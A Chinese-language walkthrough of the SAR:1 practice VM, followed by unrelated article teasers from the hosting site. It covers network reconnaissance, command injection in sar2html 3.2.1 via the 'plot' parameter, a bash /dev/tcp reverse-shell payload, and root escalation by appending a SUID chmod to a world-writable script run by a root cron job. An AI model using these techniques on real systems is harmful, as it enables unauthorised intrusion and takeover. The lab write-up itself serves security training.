红队打靶练习:SAR: 1

目录

信息收集

1、arp

2、netdiscover

3、nmap

4、nikto

5、whatweb

小结

目录探测

1、gobuster

2、dirsearch

WEB

CMS

1、cms漏洞探索

2、RCE漏洞利用

提权

get user.txt

本地提权


信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.150  00:50:56:3f:48:06       VMware, Inc.
192.168.12.254  00:50:56:f6:29:00       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.369 seconds (108.06 hosts/sec). 4 responded

2、netdiscover
 netdiscover -r 192.168.12.0/24
 
  Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.150  00:50:56:3f:48:06      1      60  VMware, Inc.
 192.168.12.254  00:50:56:f6:29:00      1      60  VMware, Inc.

3、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.150 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-30 10:42 CST
Nmap scan report for 192.168.12.150
Host is up (0.0030s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:3F:48:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sCV -p 80 -T5 -O 192.168.12.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-30 10:44 CST
Nmap scan report for 192.168.12.149
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:50:56:3F:48:06 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds


漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 80 192.168.12.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-30 10:46 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.150
Host is up (0.00015s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /robots.txt: Robots file
|_  /phpinfo.php: Possible information file
MAC Address: 00:50:56:3F:48:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 57.33 seconds


4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.150
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.150
+ Target Hostname:    192.168.12.150
+ Target Port:        80
+ Start Time:         2023-12-30 10:46:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-30 10:46:51 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.150
WhatWeb report for http://192.168.12.150
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 192.168.12.149
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.29 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Sat, 30 Dec 2023 02:48:35 GMT
        Server: Apache/2.4.29 (Ubuntu)
        Last-Modified: Sun, 20 Oct 2019 15:04:12 GMT
        ETag: "2aa6-59558e1434548-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3138
        Connection: close
        Content-Type: text/html


小结
靶机只开放了80端口

中间件是apache 版本 2.4.29

目录探测

1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.150 -x php,txt.html -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.150
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt.html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/phpinfo.php          (Status: 200) [Size: 95401]
/server-status        (Status: 403) [Size: 279]
Progress: 622929 / 622932 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.150 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.149/_23-12-30_10-56-44.txt

Target: http://192.168.12.149/

[10:56:44] Starting:
[10:57:13] 200 -   24KB - /phpinfo.php
[10:57:17] 200 -    9B  - /robots.txt

Task Completed

扫到了  phpinfo.php  robots.txt   这两个目录文件

WEB




在robots.txt目录下找到线索!

CMS

1、cms漏洞探索


ok,是一个cms。而且给了版本,我们利用一下!

┌──(root㉿ru)-[~/kali]
└─# searchsploit sar2html 3.2.1
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution                                                                                                                    | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                                                                                                        | php/webapps/47204.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 49344.py 47204.txt
  Exploit: sar2html 3.2.1 - 'plot' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49344
     Path: /usr/share/exploitdb/exploits/php/webapps/49344.py
    Codes: N/A
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/kali/49344.py


  Exploit: Sar2HTML 3.2.1 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/47204
     Path: /usr/share/exploitdb/exploits/php/webapps/47204.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /root/kali/47204.txt

存在rce漏洞!

2、RCE漏洞利用
playload

┌──(root㉿ru)-[~/kali]
└─# cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.


http://<ipaddr>/index.php?plot=;<command-here> will execute   注意这句话!



果然存在命令执行漏洞!我们利用这个反弹一个shell。

pladyload:

/bin/bash -c 'bash -i >&/dev/tcp/ip/port 0>&1



记得kali开启监听,bp的payload记得url编码!

提权

get user.txt
www-data@sar:/home/love/Desktop$ ls
ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
cat user.txt
427a7e47deb4a8649c7cab38df232b52
www-data@sar:/home/love/Desktop$



本地提权
www-data@sar:/home/love$ uname -a
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@sar:/home/love$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.3 LTS
Release:        18.04
Codename:       bionic
www-data@sar:/home/love$

www-data@sar:/home/love$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

每五分钟运行以root权限运行一次./finally.sh文件!

可以利用!

www-data@sar:/var/www/html$ ls -al
ls -al
total 40
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 .
drwxr-xr-x 4 www-data www-data  4096 Oct 21  2019 ..
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Oct 20  2019 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Oct 21  2019 write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh

./write.sh
www-data@sar:/var/www/html$ cat  write.sh
cat  write.sh
#!/bin/sh

touch /tmp/gateway
www-data@sar:/var/www/html$

finally.sh文件是以root权限运行的文件,而且finally.sh文件会再以root权限运行write.sh文件,write.sh文件是可以编辑的,我们利用起来!

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway
cp /bin/bash /tmp/geteway;chmod u+s /tmp/gateway
www-data@sar:/var/www/html$ echo "cp /bin/bash /tmp/shell" >> write.sh
echo "cp /bin/bash /tmp/shell" >> write.sh
www-data@sar:/var/www/html$ echo "chmod +s /tmp/shell" >> write.sh
echo "chmod +s /tmp/shell" >> write.sh
www-data@sar:/var/www/html$ ls -al /tmp
ls -al /tmp
total 8
drwxrwxrwt  2 root root 4096 Jan  1  2024 .
drwxr-xr-x 24 root root 4096 Oct 20  2019 ..
www-data@sar:/var/www/html$



直接写入两个payload,然后坐等五分钟!等计划任务执行即可。

但是经过我的尝试,发现没有创建成功,可能是靶机内部的某些脚本把我们创建的文件删掉了!我们尝试另外的方法!

www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >> write.sh
echo "chmod +s /bin/bash" >> write.sh

等五分钟,然后执行 /bin/bash -p  即可!


www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.txt  snap
bash-4.4# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/286331.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【Linux C | 文件操作】获取文件元数据的几个函数 | stat、fstat、lstat

&#x1f601;博客主页&#x1f601;&#xff1a;&#x1f680;https://blog.csdn.net/wkd_007&#x1f680; &#x1f911;博客内容&#x1f911;&#xff1a;&#x1f36d;嵌入式开发、Linux、C语言、C、数据结构、音视频&#x1f36d; &#x1f923;本文内容&#x1f923;&a…

吸烟者问题-第三十一天

目录 问题描述 解决问题 是否需要设置一个专门的互斥信号量&#xff1f; 结论 问题描述 该题属于”生产者-消费者”问题&#xff0c;更详细的说应该是“可生产多种产品的单生产者-多消费者” 解决问题 1、 关系分析&#xff1a;找出题目中描述的各个进程&#xff0c;分析…

(一)输出输入

文章目录 输出printf输出格式控制常见的几种格式输出小数输出很奇特指定位数对齐方式 代码现象 输入scanf输入格式控制输入坑代码现象 %c 格式控制的坑混合类型输入问题 输出printf 输出格式控制 如&#xff1a;%(占位符/格式字符) printf(“a%d”,a); 常见的几种格式输出 …

海外网红营销:母婴品牌提升影响力和市场份额的绝佳途径

随着全球化的加速和社交媒体的普及&#xff0c;越来越多的母婴品牌开始寻求海外市场拓展。在这个过程中&#xff0c;海外网红营销成为了品牌方们青睐的策略之一。本文Nox聚星将和大家探讨母婴品牌如何利用海外网红营销来提升品牌影响力并拓展市场份额。 母婴品牌的核心消费者是…

BIOS:计算机中的特洛伊木马

内容概述&#xff1a; 由于主板制造商在计算机启动时用来显示品牌徽标的图像分析组件相关的问题&#xff0c;多个安全漏洞&#xff08;统称为 LogoFAIL&#xff09;允许攻击者干扰计算机设备的启动过程并安装 bootkit。x86 和 ARM 设备都面临风险。主板固件供应链安全公司 Bin…

02--数据定义语言DDL

1、数据定义语言DDL 1.1 操作数据库-DDL 创建数据库 create database 数据库名称; 创建数据库&#xff0c;并指定字符集 create database 数据库名称 character set 字符集名; 查询所有数据库的名称 show databases; 查询某个数据库的字符集:查询某个数据库的创建语句及字…

【Matlab】ELM极限学习机时序预测算法(附代码)

资源下载&#xff1a; https://download.csdn.net/download/vvoennvv/88681649 一&#xff0c;概述 ELM&#xff08;Extreme Learning Machine&#xff09;是一种单层前馈神经网络结构&#xff0c;与传统神经网络不同的是&#xff0c;ELM的隐层神经元权重以及偏置都是随机产生的…

tecplot360 提取某一点随时加变化的参数

tecplot360 提取某一点随时加变化的参数 效果过程录制宏打开所有数据&#xff08;都进来所有的data数据&#xff09; 效果 如下&#xff0c;红点处随时间变化的温度曲线 过程 简单理解就是将所有计算的data帧中固定点的参数取出来 所以先录制宏&#xff0c;然后应用宏自动取…

大模型时代下AIGC新浪潮

大模型时代下AIGC新浪潮 文章目录 大模型时代下AIGC新浪潮1. **相关概念**2. **迎接大模型时代**3. **ChatGPT引爆AIGC产业**4. **从产业链宏观看AIGC**1. **上游&#xff1a;基础层**2. **中游&#xff1a;技术层/模型层**1. **模型层介绍**2. **预训练大模型分类与介绍** 3. …

品优购实战案例

1. 开发工具 VScode 、Photoshop&#xff08;fw&#xff09;、主流浏览器&#xff08;以Chrome浏览器为主&#xff09; 2. 技术栈  利用 HTML5 CSS3 手动布局&#xff0c;可以大量使用 H5 新增标签和样式  采取结构与样式相分离&#xff0c;模块化开发  良好的代码规范有…

js常用事件演示

目录 JS事件的具体方法 窗口事件 表单事件 键盘事件 鼠标事件 知识小拓展 JS事件的具体方法 我们用到JavaScript的时候js的事件就显得特别重要了 事件名说明onsubmit当表单提交时触发该事件onclick鼠标单击事件ondblclick鼠标双击事件onblur元素失去焦点onfocus元素获得…

Eureka服务注册与发现中心

简介 Spring Cloud封装了Netflix 公司开发的Eureka模块来实现服务治理 在传统的RPC远程调用框架中&#xff0c;管理每个服务与服务之间依赖关系比较复杂&#xff0c;管理比较复杂&#xff0c;所以需要使用服务治理&#xff0c;管理服务于服务之间依赖关系&#xff0c;可以实现…

打印菱形和金字塔类型(总结)

首先&#xff0c;在之前的学习中&#xff0c;我们了解了菱形的打印&#xff0c;今天我们来对金字塔和菱形这类打印图形的问题&#xff0c;我们来做一个总结。 这个总结的来源是这今天做了一道题 这道题的答案如下 这个题做起来并不难&#xff0c;拓展到这类问题中&#xff0c;…

【驱动序列】简单聊聊开发驱动程序的缘由和驱动程序基本信息

大家好&#xff0c;我是全栈小5&#xff0c;欢迎来到《小5讲堂》&#xff0c;这是《驱动程序》专栏序列文章。 这是2024年第4篇文章&#xff0c;此篇文章是结合了C#知识点实践序列文章&#xff0c;博主能力有限&#xff0c;理解水平有限&#xff0c;若有不对之处望指正&#xf…

面向对象(类和对象,对象内存图,成员变量和局部变量,封装,构造方法)

1. 类和对象 1.1 类和对象的理解 客观存在的事物皆为对象 &#xff0c;所以我们也常常说万物皆对象。 类 类的理解 类是对现实生活中一类具有共同属性和行为的事物的抽象类是对象的数据类型&#xff0c;类是具有相同属性和行为的一组对象的集合简单理解&#xff1a;类就是对…

cJSON代码解读

1、背景 cJSON用了很久&#xff0c;但是对它一直不太了解。这次向添加对long long类型的支持&#xff0c;一直出问题。因为有以前添加两位小数float的经历&#xff0c;我觉得会很轻松&#xff0c;没想到翻车了。于是有了这边文档&#xff0c;阅读了部分博主对cJSON的解析&…

第二十七章 正则表达式

第二十七章 正则表达式 1.正则快速入门2.正则需求问题3.正则底层实现14.正则底层实现25.正则底层实现36.正则转义符7.正则字符匹配8.字符匹配案例19.字符匹配案例211.选择匹配符&#xff08;|&#xff09;12.正则限定符{n}{n,m}&#xff08;1个或者多个&#xff09;*(0个或者多…

OpenGL FXAA抗锯齿算法(Qt,Consloe版本)

文章目录 一、简介二、实现代码三、实现效果参考资料一、简介 之前已经提供了使用VCG读取Mesh的方式,接下来就需要针对读取的网格数据进行一些渲染操作了。在绘制Mesh数据时总会遇到图形的抗锯齿问题,OpenGL本身已经为我们提供了一种MSAA技术,但该技术对于一些实时渲染性能有…

软件测试/测试开发丨Pytest 测试框架学习笔记

前言 自动化测试前&#xff0c;需要提前准备好数据&#xff0c;测试完成后&#xff0c;需要自动清理脏数据&#xff0c;有没有更好用的框架&#xff1f;自动化测试中&#xff0c;需要使用多套测试数据实现用例的参数化&#xff0c;有没有更便捷的方式&#xff1f;自动化测试后…

​iOS实时查看App运行日志

目录 一、设备连接 二、使用克魔助手查看日志 三、过滤我们自己App的日志 &#x1f4dd; 摘要&#xff1a; 本文介绍了如何在iOS iPhone设备上实时查看输出在console控制台的日志。通过克魔助手工具&#xff0c;我们可以连接手机并方便地筛选我们自己App的日志。 &#x1f4…